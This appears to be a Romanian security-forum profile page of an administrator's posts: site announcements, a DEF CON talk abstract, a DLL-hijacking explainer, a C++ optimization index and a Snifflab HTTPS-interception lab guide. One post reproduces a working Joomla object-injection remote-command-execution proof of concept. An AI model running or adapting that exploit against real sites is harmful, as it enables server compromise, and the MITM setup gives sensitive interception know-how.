-
Posts
18737 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
O sa ma uit la partea de logare, folositi logarea de pe forum, cea de pe homepage e improvizata si nu trimit toate variabilele.
-
Nu exista setare pentru asa ceva, o sa ii intreb pe dezvoltatori.
-
E pe lista. Daca imi face cineva o expresie regulata pentru .htaccess, cu atat mai repede.
-
Nu, s-au pierdut toate posturile din ianuarie pana acum. Nu o sa se recupereze.
-
O sa pun si stntax highlight, e pe lista.
-
Daca vreti sa faceti teste, folositi aceasta categorie.
-
Da, interesant, cine stie pe unde-o fi scapat, e de vazut. Thanks. Vrem sa ii dam drumul saptamana asta. Daca ai idei, da-mi un semn.
-
Test.
-
Salut, Am decis sa inlocuim vechiul vBulletin 4 cu o platforma mult mai moderna si mai utila: IPBoard. Mentionez faptul ca este posibil sa apara probleme pe care insa o sa le rezolvam. Orice problema intampinati, postati aici sau trimiteti-mi un PM. Upgrade-ul a inceput in ianuarie, asadar tot ce s-a postat in ianuarie a disparut. De asemenea, au loc mai multe schimbari de care va rog sa tineti cont: 1. Nu se mai permit lucruri ilegale ca: root-uri, vps-uri, smtp-uri etc. 2. Au disparut cateva categorii: Club ShowOff, Games Hacks etc. Am facut putina ordine. 3. Exista un sistem de Downloads insa nu se permite upload-ul fisierelor cu drepturi de autor. 4. Accesand acest website necesita acceptarea termenilor si conditiilor. Ar fi bine sa cititi acel text, nu este lung. 5. Free stuff va fi limitat, nu se va mai posta orice cont furat. 6. La RST Market se va modera fiecare topic postat. Inca nu stim ce sa facem cu el. 7. Nu mai exista niciun VIP. Cine va fi util de acum inainte va primi VIP. 8. Nu pot oferi o lista completa de modificari, o voi actualiza cu timpul. Scopul acestui forum este sa ajute comunitatea romaneasca in domeniile IT security, programare si multe altele. Odata cu aceasta schimbare, vrem sa scapam de cei care intra aici pentru mizerii: scannere, root-uri si alte prostii care le pot aduce probleme. Daca ati venit aici pentru asa ceva, acesta nu este locul potrivit. Va vom bana pentru orice apropiere de aceste practici. Nu sunteti utili pentru comunitate si nici comunitatea nu este utila pentru voi. Am investit atat bani cat si timp in acest forum (cei din staff + altii). Nu vreau sa vorbesc in numele lor, eu vreau sa continui acest proiect deoarece acum multi ani stiam doar Counter-Strike, insa dupa ceva timp petrecut in aceasta comunitate, cu persoanele din acele timpuri, m-a ajutat si acum lucrez in domeniul IT security. Scopul acestui forum este sa ii educe pe cei noi si sa nu ii duca pe cai gresite, insa fiecare este responsabil pentru actiunile sale. Nu inseamna insa faptul ca forumul va fi complet whitehat :). Tehnici blackhat, exploituri si alte lucruri interesante sunt prezentate de catre nume mari in domeniu la conferinte internationale, deci nu ne vom feri sa le publicam aici. Incercati sa faceti si voi cate ceva, o sa vedeti ca va va ajuta mult pe viitor. Incercati sa ii ajutati pe ceilalti si veti vedea ca veti fi de asemenea ajutati. Mai multe, cu timpul. // Staff-ul RST
- 143 replies
-
- 21
-
-
-
Salut, Aceasta categorie este dedicata incepatorilor. Daca esti incepator si ai o intrebare la care nu gasesti raspunsul, ai nevoie de ajutor in legatura cu o problema simpla sau doar niste sfaturi, aici e categoria potrivita. Evitati insa intrebarile de tipul "Cum sparg un site" si asa mai departe. Vom crea o pagina de FAQ (intrebari frecvente) unde va vom raspunde la aceste intrebari.
-
- 4
-
-
R.I.P Ian Murdock, Founder of Debian Linux, Dead at 42
Nytro replied to TheOne's topic in Stiri securitate
https://web.archive.org/web/20151229122811/https:/twitter.com/imurdock -
Mai este valabil.
-
Scanezi cateva porturi comune pentru proxy-uri si le testezi: incerci sa trimiti un request. Poti de asemenea sa vezi daca necesita autentificare. Ar prinde multe proxy-uri "publice" (aka honeypots) dar ar fi extrem de lent.
-
http://exfiltrated.com/research-Instagram-RCE.php
-
DEF CON 23 - Ionut Popescu - NetRipper: Smart Traffic Sniffing for Penetration Testers Publicat pe 16 dec. 2015 The post-exploitation activities in a penetration test can be challenging if the tester has low-privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor network traffic of employees or to analyze a malicious application. Speaker Bio Ionut works as a Senior Security Consultant at KPMG in Romania. He is passionate about ASM, reverse engineering, shellcode and exploit development and he has a MCTS Windows Internals certification. He spoke at various security conferences in Romania like: Defcamp, OWASP local meetings and others and also at the yearly Hacknet KPMG international conference in Helsinki and Berlin. Ionut is also the main administrator of the biggest Romanian IT security community: rstforums.com and he writes technical articles on a blog initiated by a passionate team: securitycafe.ro. Twitter: @NytroRST
-
[h=1]Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution[/h] ''' Simple PoC for Joomla Object Injection. Gary @ Sec-1 ltd http://www.sec-1.com/ ''' import requests # easy_install requests def get_url(url, user_agent): headers = { 'User-Agent': user_agent } cookies = requests.get(url,headers=headers).cookies for _ in range(3): response = requests.get(url, headers=headers,cookies=cookies) return response def php_str_noquotes(data): "Convert string to chr(xx).chr(xx) for use in php" encoded = "" for char in data: encoded += "chr({0}).".format(ord(char)) return encoded[:-1] def generate_payload(php_payload): php_payload = "eval({0})".format(php_str_noquotes(php_payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' injected_payload = "{};JFactory::getConfig();exit".format(php_payload) exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate return exploit_template pl = generate_payload("system('touch /tmp/fx');") print get_url("http://172.31.6.242/", pl) Sursa: https://www.exploit-db.com/exploits/38977/
-
[h=1]Retargetable Decompiler[/h] Our main goal is to create a retargetable decompiler that can be utilized for source code recovery, static malware analysis, etc. The decompiler is supposed to be not bounded to any particular target architecture, operating system, or executable file format. [h=3]Features[/h] Handles all the commonly used file formats (ELF, PE, COFF). Currently supports the Intel x86, ARM, MIPS, PIC32, and PowerPC architectures. Can decompile to two output high-level languages: C and a Python-like language. Compiler and packer detection. Extraction and utilization of debugging information (DWARF, PDB). Signature-based removal of statically linked library code. Reconstruction of functions, high-level constructs, types, etc. Generation of call graphs, control-flow graphs, and various statistics. It is actively developed. You can try all of these features by using our online decompilation service. Sursa: https://retdec.com/
-
Crash Course In DLL Hijacking by Tien Phan | December 10, 2015 Overview This week, we heard a lot about a DLL hijacking vulnerability from the security community. It began with a 0-day DLL hijacking in Microsoft Office which was discovered by an independent security researcher named Parvez Anwar. Shortly after, the website securify.nlpublished an article detailing this kind of attack and discussing the vast potential attack surface associated with DLLs and OLE. A dynamic link library (DLL) is a basic component in the Windows operating system. Certain DLLs will be loaded into Windows applications when they start if they are needed. DLLs provide software applications with resources such as Application Programming Interfaces (APIs) and additional procedures. If an attacker can control which DLL a program loads, then the attacker can insert a malicious DLL into the DLL loading process. In fact, this method is not new. Quite a few articles regarding this technique are available on the Internet, especially from Microsoft. In a nutshell, the vulnerability in this latest Microsoft 0-day lay in the way Microsoft Office searches for DLL components that are not present in the system, consequently allowing DLL hijacking attacks. But as we will detail below, that kind of vulnerability is not exclusive to Microsoft Office. Attack Details DLL search order is well documented by Microsoft. To recap, depending on the configuration of the system, a program can decide the order of the directories to be searched for a DLL to load. By default, the order of this search is as follows: The directory from which the application is loaded The current directory The system directory, usually C:\Windows\System32\ (The GetSystemDirectory function is called to obtain this directory.) The 16-bit system directory - There is no dedicated function to retrieve the path of this directory, but it is searched as well. The Windows directory. The GetWindowsDirector function is called to obtain this directory. The directories that are listed in the PATH environment variable. In this case, the current directory is the problem. When a program makes a decision to load a DLL from the current directory, it can lead to the DLL hijacking. For example, if the user is opening a Microsoft Word document, Microsoft Office will try to load its DLL component from the location of that document file. An attacker can then place a malicious DLL in the location of the document and as a result, Microsoft Office inadvertently loads the malicious code. Another practical scenario is sharing a Microsoft Document file using Windows sharing with a malicious DLL. If SafeDllSearchMode is enabled, it is more difficult for an attacker to use this technique. In such a case, the DLL search order is as follows: The directory specified by lpFileName function The System directory (The GetSystemDirectory function is called to obtain this directory.) The 16-bit system directory - There is no dedicated function to retrieve the path of this directory, but it is searched as well. The Windows directory (The GetWindowsDirector y function is called to obtain this directory.) The current directory The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path. Nonetheless, the current directory is still in the list of directories to be searched. The difference here is that the program searches system directories for a DLL component first and, if not found, will then try the current directory. How do I protect myself from DLL hijacking? The following is some guidance to prevent you from becoming a victim of DLL-hijacking attacks. For end users, the best way to prevent this attack is to apply the latest patch from the vendor. You can also harden your system using the following steps: Open Notepad Copy and paste the following text: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESystemCurrentControlSetControlSe ssion Manager] "SafeDllSearchMode"=dword:00000001 [HKEY_LOCAL_MACHINESystemCurrentControlSetControlSe ssion Manager] "CWDIllegalInDllSearch"=dword:ffffffff Save as “patch.reg” on your system. Double click patch.reg and click Yes on the Windows prompt. The above script will enable SafeDllSearchMode and disable loading of DLLs from the current directory. For developers, you can follow the suggestions from Microsoft. We also developed a small tool for learning and demonstration purposes. This tool will track new processes created. It will then apply a hook into any new process to force a call to the SetDLLDirectory API with a blank argument. This means that any new process will be protected from loading DLLs located in the current directory. You can get the source code of the tool here. The following is a quick demo of the tool: -= FortiGuard Lion Team =- by Tien Phan | December 10, 2015 Sursa: http://blog.fortinet.com/post/a-crash-course-in-dll-hijacking
-
Optimizing software in C++An optimization guide for Windows, Linux and Macplatforms By Agner Fog. Technical University of Denmark. Copyright © 2004 - 2014. Last updated 2014-08-07. Contents1 Introduction ....................................................................................................................... 3 1.1 The costs of optimizing ............................................................................................... 4 2 Choosing the optimal platform........................................................................................... 5 2.1 Choice of hardware platform....................................................................................... 5 2.2 Choice of microprocessor ........................................................................................... 6 2.3 Choice of operating system......................................................................................... 6 2.4 Choice of programming language ............................................................................... 8 2.5 Choice of compiler.................................................................................................... 10 2.6 Choice of function libraries........................................................................................ 12 2.7 Choice of user interface framework........................................................................... 14 2.8 Overcoming the drawbacks of the C++ language...................................................... 14 3 Finding the biggest time consumers ................................................................................ 16 3.1 How much is a clock cycle? ...................................................................................... 16 3.2 Use a profiler to find hot spots .................................................................................. 16 3.3 Program installation .................................................................................................. 18 3.4 Automatic updates .................................................................................................... 19 3.5 Program loading ....................................................................................................... 19 3.6 Dynamic linking and position-independent code ....................................................... 20 3.7 File access................................................................................................................ 20 3.8 System database ...................................................................................................... 20 3.9 Other databases ....................................................................................................... 21 3.10 Graphics ................................................................................................................. 21 3.11 Other system resources.......................................................................................... 21 3.12 Network access ...................................................................................................... 21 3.13 Memory access....................................................................................................... 22 3.14 Context switches..................................................................................................... 22 3.15 Dependency chains ................................................................................................ 22 3.16 Execution unit throughput ....................................................................................... 22 4 Performance and usability ............................................................................................... 23 5 Choosing the optimal algorithm ....................................................................................... 24 6 Development process...................................................................................................... 25 7 The efficiency of different C++ constructs........................................................................ 26 7.1 Different kinds of variable storage............................................................................. 26 7.2 Integers variables and operators............................................................................... 29 7.3 Floating point variables and operators ...................................................................... 32 7.4 Enums ...................................................................................................................... 33 7.5 Booleans................................................................................................................... 33 7.6 Pointers and references............................................................................................ 36 7.7 Function pointers ...................................................................................................... 37 7.8 Member pointers....................................................................................................... 37 7.9 Smart pointers .......................................................................................................... 38 7.10 Arrays ..................................................................................................................... 38 7.11 Type conversions.................................................................................................... 40 7.12 Branches and switch statements............................................................................. 43 7.13 Loops...................................................................................................................... 45 2 7.14 Functions ................................................................................................................ 48 7.15 Function parameters ............................................................................................... 50 7.16 Function return types .............................................................................................. 50 7.17 Structures and classes............................................................................................ 51 7.18 Class data members (properties)............................................................................ 51 7.19 Class member functions (methods)......................................................................... 53 7.20 Virtual member functions ........................................................................................ 53 7.21 Runtime type identification (RTTI)........................................................................... 54 7.22 Inheritance.............................................................................................................. 54 7.23 Constructors and destructors .................................................................................. 55 7.24 Unions .................................................................................................................... 55 7.25 Bitfields................................................................................................................... 56 7.26 Overloaded functions .............................................................................................. 56 7.27 Overloaded operators ............................................................................................. 56 7.28 Templates............................................................................................................... 57 7.29 Threads .................................................................................................................. 60 7.30 Exceptions and error handling ................................................................................ 61 7.31 Other cases of stack unwinding .............................................................................. 65 7.32 Preprocessing directives ......................................................................................... 65 7.33 Namespaces........................................................................................................... 65 8 Optimizations in the compiler .......................................................................................... 66 8.1 How compilers optimize ............................................................................................ 66 8.2 Comparison of different compilers............................................................................. 74 8.3 Obstacles to optimization by compiler....................................................................... 77 8.4 Obstacles to optimization by CPU............................................................................. 81 8.5 Compiler optimization options ................................................................................... 81 8.6 Optimization directives.............................................................................................. 82 8.7 Checking what the compiler does ............................................................................. 84 9 Optimizing memory access ............................................................................................. 87 9.1 Caching of code and data ......................................................................................... 87 9.2 Cache organization................................................................................................... 87 9.3 Functions that are used together should be stored together...................................... 88 9.4 Variables that are used together should be stored together ...................................... 88 9.5 Alignment of data...................................................................................................... 90 9.6 Dynamic memory allocation...................................................................................... 90 9.7 Container classes ..................................................................................................... 93 9.8 Strings ...................................................................................................................... 96 9.9 Access data sequentially .......................................................................................... 96 9.10 Cache contentions in large data structures ............................................................. 96 9.11 Explicit cache control .............................................................................................. 99 10 Multithreading.............................................................................................................. 101 10.1 Hyperthreading ..................................................................................................... 103 11 Out of order execution................................................................................................. 103 12 Using vector operations............................................................................................... 105 12.1 AVX instruction set and YMM registers ................................................................. 107 12.2 AVX-512 instruction set and ZMM registers .......................................................... 107 12.3 Automatic vectorization......................................................................................... 107 12.4 Using intrinsic functions ........................................................................................ 109 12.5 Using vector classes ............................................................................................. 113 12.6 Transforming serial code for vectorization............................................................. 117 12.7 Mathematical functions for vectors........................................................................ 119 12.8 Aligning dynamically allocated memory................................................................. 120 12.9 Aligning RGB video or 3-dimensional vectors ....................................................... 120 12.10 Conclusion.......................................................................................................... 120 13 Making critical code in multiple versions for different instruction sets........................... 122 13.1 CPU dispatch strategies........................................................................................ 122 13.2 Model-specific dispatching.................................................................................... 124 13.3 Difficult cases........................................................................................................ 124 3 13.4 Test and maintenance .......................................................................................... 126 13.5 Implementation ..................................................................................................... 126 13.6 CPU dispatching in Gnu compiler ......................................................................... 128 13.7 CPU dispatching in Intel compiler ......................................................................... 130 14 Specific optimization topics ......................................................................................... 132 14.1 Use lookup tables ................................................................................................. 132 14.2 Bounds checking .................................................................................................. 134 14.3 Use bitwise operators for checking multiple values at once................................... 135 14.4 Integer multiplication............................................................................................. 136 14.5 Integer division...................................................................................................... 137 14.6 Floating point division ........................................................................................... 139 14.7 Don't mix float and double..................................................................................... 140 14.8 Conversions between floating point numbers and integers ................................... 141 14.9 Using integer operations for manipulating floating point variables......................... 142 14.10 Mathematical functions ....................................................................................... 145 14.11 Static versus dynamic libraries............................................................................ 146 14.12 Position-independent code.................................................................................. 148 14.13 System programming.......................................................................................... 150 15 Metaprogramming ....................................................................................................... 150 16 Testing speed.............................................................................................................. 153 16.1 Using performance monitor counters .................................................................... 155 16.2 The pitfalls of unit-testing ...................................................................................... 156 16.3 Worst-case testing ................................................................................................ 157 17 Optimization in embedded systems............................................................................. 158 18 Overview of compiler options....................................................................................... 160 19 Literature..................................................................................................................... 163 20 Copyright notice .......................................................................................................... 164 Download: http://www.agner.org/optimize/optimizing_cpp.pdf
-
How To Perform "MITM Attack On HTTPS" Traffic Using Snifflab Posted by Kali Linux Researchers developed a technical test environment for capturing and decrypting WiFi data transmissions. The code for it lives on Github. Researchers created a WiFi hotspot that is continually collecting all the packets sent over it. All connected clients’ even HTTPS communications are subjected to a “Man-in-the-middle” attack, whereby they can later be decrypted for analysis. This article presents a detailed look at how this test environment works and then gets into how to set one up for your own testing purposes, including a list of required parts. Setting one up yourself is not user-friendly, and requires familiarity with the unix command line and networking concepts. Motivation Researchers and end-users alike often seek to understand what data their mobile device is sending to third parties. Unfortunately, monitoring one’s phone to see what, and to whom, data is sent is not exactly simple. Using packet capture software on Android is impossible without first rooting the device, and even then, difficult to use and export saved data. There are no applications to capture packets on iOS. Also See:How To Sniff The Browser History Using Sniffly Our motivation for creating the test environment described herein is to make it incredibly easy to capture packets for any device with a WiFi connection, with very little client configuration needed. How it works In our environment, dubbed Snifflab, a researcher simply connects to the Snifflab WiFi network, is prompted to install a custom certificate authority on the device, and then can use their device as needed for the test. Snifflab architecture All traffic on the network is logged by a Raspberry Pi dedicated to that task (“PCAP Collecting Machine”, in the Figure). The traffic is cloned by a Great Scott Gadgets Throwing Star LAN Tap, which routes it both to its destination, and to our Raspberry Pi. The Pi continually collects packet data, creating new packet capture (pcap) files at a regular interval, or once the active file reaches a configurable size. Saved files are regularly transferred to another machine (“Backup Machine”) for persistent storage. Users with SSH access to the Pi can also manually restart the pcap service, to get instant access to the captured packets, instead of waiting for the interval. The custom certificate that each client must install enables the proxy server (“MITM Proxy Machine”) through which Snifflab routes its traffic to intercept HTTPS requests to the outside world, and re-encrypt them using certificates generated on-the-fly. This allows for the researcher to later decrypt most captured network traffic sent over HTTPS. On the backup machine, the researcher has access to all previously-collected PCAPs, organized into folders by date, with each file named by the unix time at which the capture began. Also See:Network Scanning Using Nmap 7 From Basic To Advance The researcher may then open up the collected PCAP(s) in Wireshark or their utility of choice to analyze and decrypt the traffic. On packet captures A Packet capture (pcap) is a widely used data format for storing low-level network data transmission information. The packet is the base unit of data transmission on networks. To send a message from one computer to another, networking software breaks up the message into small packet files, each with metadata that — among other things — describes the source of the data, the destination, and the specific packet’s ID so that packets can be reassembled correctly at the destination. A pcap file is a collection of packets sent over a network. pcaps are created using software that “listens” to one or more network interfaces running on a given device, and dumps all the data packets it detects into a pcap file for future analysis. For example, one could listen on a computer’s WiFi interface, or the ethernet interface, or both. How-to This section describes the hardware, software, and configuration we used to set up Snifflab. It should be sufficient information to guide the creation of a new Snifflab instance from scratch. Snifflab router, PCAP machine, and LAN Tap Parts needed 1 router (in addition to your primary one), capable of running DD-WRT standard firmware 1 Raspberry Pi 2 Model B+ 1 server running all the time (Ubuntu) for backups and running the MITM proxy 1 Great Scott Gadgets Throwing Star LAN Tap 1 USB LAN adapter (TRENDnet TU3-ETG) 1 USB WiFi adapter (TP-Link TL-WN725N) Many Ethernet Cables The testing network We used a Cisco WRT54GL router to administer the Snifflab access point. We installed the DD-WRT Standard build firmware on this router. Please consult the DD-WRT guide to ensure your router is supported, lest you risk bricking your device. We connected this router’s internet port to our pre-existing LAN, creating a subnet with its own IP space. However, we don’t directly connect the router to the LAN. Between the LAN ethernet and the Snifflab router, we place a Great Scott Gadgets Throwing Star LAN Tap. This device allows us to passively sniff all traffic passing through it. In this manner, a copy of all network traffic is copied and directed to our PCAP collecting machine. Also See:How To Hack Facebook|Gmail And Twitter Account By Hacking Android Smartphone The LAN tap, unfortunately, has two separate ethernet ports for sniffing traffic. One is for inbound traffic, and the other, outbound. As such, the PCAP collecting machine needs to have two ethernet interfaces on which to listen for packets. This is discussed further below. Transparently proxying traffic to get MITM’d The router’s iptables must also be configured to transparently forward packets to the MITM proxy device. To do that, we login as administrator to the DD-WRT network portal, and navigate to Administration > Commands. There, we enter in the following commands, replacing the value of the PROXYIP variable with the IP address of your MITM proxy machine: PROXYIP=192.168.0.2 iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443 ip rule add fwmark 3 table 2 ip route add default via $PROXYIP dev vlan1 table 2 The last line in the above code refers to the vlan1 network interface; Make sure the network interface your router uses to communicate with the WAN is in fact vlan1 for your router, and adjust if needed. For example, this guide to setting up transparent proxies mentions br0 instead. Make it easy to get MITM’d The other thing we’d like our Snifflab router to do is to act as a convenient delivery service for our mitmproxy CA certificate. The method we chose is to make Snifflab a captive WiFi portal, meaning that users must visit a sign-in splash page before being able to use the network. We create a custom splash page for the user to sign into, and a redirect page from where the certificate can be downloaded after sign-in. A captive WiFi portal screen makes it simple to install the MITM certificate on a client device. To configure a captive WiFi portal, we login to the DD-WRT admin interface on Snifflab’s default gateway, and navigate to Services>Hotspot. We then enable NoCatSplash. Set up the NoCatSplash parameters to point the home page and splash URLS to a web server (hopefully running on your WAN) that serves redirect.html and splash.html as contained in the Git repository described below. Ensure that Homepage Redirection is turned on. Set a login timeout. The PCAP collecting machine In our system, a Raspberry Pi 2 Model B+ functions as the PCAP collecting machine. Setting up this Pi for sniffing network traffic sent to it from the LAN tap, and then backing up those captured packets to another machine, requires the configuration of multiple network interfaces. Also See:How To Perform Deauthentication Attack Using "Infernal Twin" On Single|Multiple Wifi Access Point Since the LAN tap splits inbound traffic to one ethernet port, and outbound to another, we need two ethernet interfaces on the Pi to capture both directions. However, packet capturing is much more straightforward if done on a single network interface. As such, we’ll have to bond the two ethernet connections into one network interface. To do that, install ifenslave and set networking interface commands as follows: sudo apt-get install ifenslave-2.6/etc/network/interfaces auto lo iface lo inet loopback iface eth0 inet manual iface eth1 inet manual allow-hotplug wlan0 iface wlan0 inet dhcp wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp auto bond0 iface bond0 inet dhcp bond-mode 3 bond-miimon 100 slaves eth0 eth1 Make sure bond-mode is set to 3, a “broadcast” policy, meaning all packets from all interfaces are transmitted via the bonding interface, otherwise packets may get dropped. WiFi Setting up WiFi driver for TP-Link TL-WN725N mkdir driver cd driver wget https://dl.dropboxusercontent.com/u/80256631/8188eu-v7-20150713.tar.gz tar xvzf 8188eu-v7-20150713.tar.gz sudo ./install.sh cd ../ rm -rf driver sudo reboot /etc/wpa_supplicant/wpa_supplicant.conf ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev update_config=1 network={ ssid="" psk=hashofyourpassword proto=RSN key_mgmt=WPA-PSK pairwise=TKIP auth_alg=OPEN } Customize this script to suit your particular WiFi connection. It may be easier to generate a config file through the Raspberry Pi GUI. It’s also best practice to not store the plaintext version of your WiFi password in this file. Instead, run wpa_passphrase to generate a hash of the password. A WiFi connection is necessary since the two ethernet ports only receive traffic cloned from the LAN tap, and don’t actually connect to the network. Thus, a networking interface is needed so that one can SSH into your machine, and transmit pcap files to the backup machine. Getting the network running correctly on boot By default, on Raspberry Pis, if ethernet is plugged in then WiFi will be automatically disabled. First, turn off ethernet hotplugging, which causes WiFi to get disabled. /etc/default/ifplugd INTERFACES="eth0" HOTPLUG_INTERFACES="eth0" ARGS="-q -f -u0 -d10 -w -I" SUSPEND_ACTION="stop" Next, the below script runs at startup to ensure that multiple networking interfaces can operate simultaneously. We run the ifup command on each network interface to force start all of them. We also set the two ethernet interfaces to promiscuous mode to ensure they process all packets being routed to them, for complete sniffing. /etc/init.d/network.sh #!/bin/sh ### BEGIN INIT INFO # Provides: network.sh # Short-Description: Ensure WiFi as well as Ethernet interfaces are up # Description: # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog ### END INIT INFO sudo ifplugd eth0 --kill sudo ifup wlan0 sudo ifup eth0 sudo ifup eth1 sudo ifconfig eth1 promisc sudo ifconfig eth0 promisc exit 0 Dependencies for collecting packets Ensure you setup your ~/.ssh/config to connect to your analysis machine without the need for a password, otherwise the backup script will fail. ssh-keygen -t rsa cat ~/.ssh/id_rsa.pub | ssh user@server 'cat >> .ssh/authorized_keysInstalling libpcap sudo apt-get install libpcap0.8 libpcap0.8-dev libpcap-devInstalling pip sudo apt-get install python3-pip sudo apt-get install python-pipInstalling pcapy wget https://pypi.python.org/packages/source/p/pcapy/pcapy-0.10.8.tar.gz tar xvzf pcapy-0.10.8.tar.gz cd pcapy-0.10.8/ python setup.py installInstalling dpkt pip install dpkt pip install dpkt --upgradeMake sure timezone is set correctly tzconfig sudo dpkg-reconfigure tzdata Capturing Packets Get the latest code from Github. This guide refers to a copy of the repo housed at /home/pi/snifflab. This repository contains sniffer.py, a Python application developed to capture packets on an interface into PCAPs, creating new ones at a fixed interval, or when a file size limit is reached. The interface, interval, and filesize limit are all configurable command line parameters: -i (specify the network interface) -s (specify the file size limit) -t (specify the time interval, in seconds, between new PCAP files) -f (specify a filename suffix to append to each PCAP. -u (specify a ssh username for a remote backup) -h (specify a ssh host for remote backup) -p (specify the path on the remote host for backup) The script also backs up old PCAPs to a separate machine by launching an external bash script upon the creation of a new PCAP file. As described above, there are also parameters to specify the remote backup server username, hostname, and path for SCPing the PCAPs: Move the repository’s splash.html and redirect.html to the WAN web server of your choice, asdescribed above. Edit the link in splash.html to correspond to your Snifflab router’s IP address. Configure the backup script Make sure to add the PCAP machine’s public SSH key to the known_hosts file on the remote machine, or else movescript will prompt the user for a password. Start capturing packets on startup — create a sniffer service The simplest way to ensure reliably consistent packet capturing is to wrap sniffer.py in an upstart service, so it can easily be started on boot, and restarted as needed. To do that, create and edit the file below: /etc/init/sniffer.conf #sniffer.conf start on runlevel [2345] stop on runlevel [016] script exec echo "hi" cd /home/pi/mitm if [ -z "$filenamesuffix" ]; then exec python sniffer.py -i bond0 -s 100 -t 120 else exec python sniffer.py -i bond0 -s 100 -t 120 -f $filenamesuffix fi end script Make sure to edit the parameters of sniffer.py to suit your needs, based on the previous section. With this service all set up, it is easy to start / stop collecting packets: sudo service sniffer startThis service supports an additional parameter, a filename suffix. This will cause all pcaps collected by the service to be saved with the parameter as a file suffix. For instance, running sudo service sniffer start filenamesuffix=test1will yield timestamped packets with test1 as a suffix, similar to 123456789_test1.pcap. This makes it easy to label collected pcaps. When starting a new test, simply restart the service with a new filename suffix: sudo service sniffer restart filenamesuffix=mynewtestOf course, if the filenamesuffix parameter is missing, no suffix is included in the filename. After completing a test, I usually restart the service without a suffix, to cleanly demarcate the completion of the test in the filesystem. The MITM Proxy machine In our environment, we used a machine running Ubuntu Server operating system to act as a proxy that replaces SSL certificates with those under our control. It does this by relying on the well-knownmitmproxy software. Our MITM proxy machine exists outside of the Snifflab network, on the WAN. Snifflab forwards all traffic to this machine. This section describes how to configure a service that runs a transparent mitmproxy on startup. First, install mitmproxy and mitmdump, following the guide on their website. Now, we can set up a default configuration for mitmproxy to refer to on runtime. In our environment, we created a directory: sudo mkdir /etc/mitmproxy sudo chmod -R 755 /etc/mitmproxy touch /etc/mitmproxy/common.confEdit common.conf to match the following: --cadir=/etc/mitmproxy/cybersniff --port=4567 --noappI chose an arbitrary port number because I do not like using defaults. (mitmproxy defaults to 8080). Now, create a directory to store the mitmproxy certificate authority information: mkdir cybersniffNext, generate your own certificate for mitmdump to use as a CA. I do this so I don’t have to trust mitmproxy’s CA. Mitmproxy has a guide on how to generate your own certificate. I would recommend adding –days 1000 to the certificate generation step, to ensure the cert doesn’t expire for some time. Make sure the certificate files are stored in the path referred to in common.conf Now, let’s set up a service to ensure the proxy starts on boot, and can be easily started and stopped as needed: touch /etc/init/mitm.confEdit your newly-created mitm.conf to include the following: # mitm.conf start on filesystem script sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567 SSLKEYLOGFILE=/var/log/mitmkeys.log export SSLKEYLOGFILE echo "MITM Keys being logged here: $SSLKEYLOGFILE" exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf end script This service does several things. First of all, it starts when the filesystem is loaded. You can also start, stop, and restart it using commands like: service mitm stopSecondly, the service sets up iptables rules to route all incoming traffic on ports 80 and 443 to port 4567 (change this value to correspond to your mitmproxy port defined in common.conf). Next, it specifies an SSLKEYLOGFILE environment variable. This is important, as it provides a place for mitmproxy to save session keys used to set up encrypted communications. With these keys being routinely logged, we can point wireshark to this location (discussed below), and use it to decrypt SSL traffic that uses Diffie-Hellman key exchange. Finally, the service runs mitmdump (a non-interactive version of mitmproxy) in transparent mode, using the configuration file we previously created. Important: One last thing to do in order to ensure that devices connect to Snifflab can access HTTPS resources without a certificate error is to copy the generated .pem file for your custom CA certificate to the web directory where redirect.html is located. Edit the link in redirect.html (included in the Github repo, and hosted on your web server) to point users to download your pem file for them to install on their device. Also See:How To Hack Facebook Account Password Using Brute Force Attack Of course, you can develop your own way of providing the certificate to devices on the network. Analysing the data in Wireshark To decrypt packets that have been encrypted using perfect forward secrecy, it’s best to have the latest version of Wireshark installed. This might mean adding the Wireshark development PPA to your Ubuntu environment. Next, configure Wireshark’s Preferences > Protocols > SSL to utilize your MITM proxy’s CA bundled certificate file as well as the master keys list MITMproxy is logging. Click on RSA Keys, and enter the following: [TABLE=width: 668] [TR] [TD]IP address[/TD] [TD]Port[/TD] [TD]Protocol[/TD] [TD]Key File[/TD] [/TR] [TR=bgcolor: #EEEEEE] [TD]0.0.0.0[/TD] [TD]443[/TD] [TD]http[/TD] [TD]/path/to/mitmproxy-ca.pem[/TD] [/TR] [/TABLE] This tells Wireshark to attempt to decrypt all traffic (0.0.0.0 is a stand-in address for any IP) on port 443 as HTTP data, using your key file. Back in the main SSL protocol preference pane, set up an SSL debug file to you can assess any errors that might occur. Finally, point (Pre)-Master-Secret log filename to the path set in the $SSLKEYLOGFILE environment variable (or a place you copy that log file to). With this, you can load any of the PCAP files collected on the SniffLab network and decrypt HTTPS connections! Happy hacking. Sursa 